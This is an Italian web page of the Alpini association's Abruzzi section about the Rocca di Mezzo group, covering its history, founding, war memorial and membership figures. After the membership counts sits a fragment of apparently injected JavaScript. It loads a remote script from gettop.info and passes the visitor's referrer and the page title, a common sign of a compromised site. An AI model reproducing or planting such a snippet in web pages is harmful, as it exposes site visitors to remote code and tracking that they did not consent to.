A.N.A. Sezione Abruzzi

Gruppo Alpini di Rocca di Mezzo.

luglio 3rd, 2007  |  Published in I gruppi della Sezione Abruzzi

Così chiamata a suo tempo dagli antichi fondatori del paese -Rocca di Mezzo -; in effetti topograficamente è un grande masso di roccia nel bel mezzo di una chiostra di montagna fra il Sirente ed il Velino per cui ben si può dire Roccadimezzo madre degli Alpini, perché i suoi figli, ancora bambini devono affrontare le dure inclemenze del clima molto rigido, che dà luogo ad abbondanti nevicate (costringendo le persone ad uscire di casa dal balcone), come ricorda l'alpi­no vivente più anziano del Gruppo (novantenne) Scoccia Pio.

La Rocca diede alla Patria migliaia di Alpini nella guerra 1915-18, e ancora innumerevoli ne diede nel reclutamento del 1929 e nel secondo conflitto mondiale con gravi perdite, tra i quali, ricordiamo, l'eroe nazionale Medaglia d'oro tenente Italo D'Eramo (che dà il nome al Gruppo).

Alla sua indelebile memoria è stato realizzato un monumento (tutto in bronzo).

Il Gruppo, dalla sua nascita ha sempre partecipato a tutte le cerimonie del paese organizzate dal Comune, dalle Scuole…ecc.

Esso accompagna sempre i soci che "sono andati avanti" e hanno raggiunto il "Paradiso di Cantore

".

alp. Pio Scoccia 
 

Il Gruppo è intestato alla memoria dell'alp. M. d'o. ten. Italo D'Eramo ed è stato costituito 1'11-08-1957, per opera dell'alpino Lidio Colarossi -classe 1933- che si congedò nell'estate del 1956. Lidio Colarossi espletò il servizio di leva a Tarvisio nell' 8° Reg. Batt. L'Aquila -143° Comp.‑

Il Gruppo è stato guidato da diversi Capigruppo.

Nei primi anni ottanta, per opera dell'allora capogruppo Dante Benedetti venne inaugurato un Monumento alla memoria della M. d'o. Italo D'Eramo.


Il capogruppo
Lidio Colarossi

Le notizie relative ai Gruppi della Sezione Abruzzi sono tratte dalla seconda parte del libro intitolato "Alpini Verso L'aurora" di Mario SALVITTI, che narra la storia di 150 Gruppi Alpini abruzzesi. Tale libro é stato fortemente voluto dall'ex presidente sezionale Antonio Festa ed é stato realizzato in occasione della celebrazione del 70° anniversario della fondazione della Sezione Abruzzi (1929-1999).

Il libro va ad aggiungersi a quello di Antonio Procacci: "Abruzzo Terra Di Alpini". Entrambi offrono al lettore testimonianze del glorioso passato degli Alpini abruzzesi.

Il gruppo in esame alla fine dell'anno 2006 registra i seguenti soci:

  • – Soci alpini nr 56.
  • – Soci aggregati nr. 0.

 

Il gruppo in esame alla fine dell'anno 2007 registra i seguenti soci:

  • – Soci alpini nr. 57;
  • – Soci aggregati nr. 3.

L'attuale capogruppo è il Signor : Capri av. Maurizio.

}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Your Comments

L’Alpino d’Abruzzo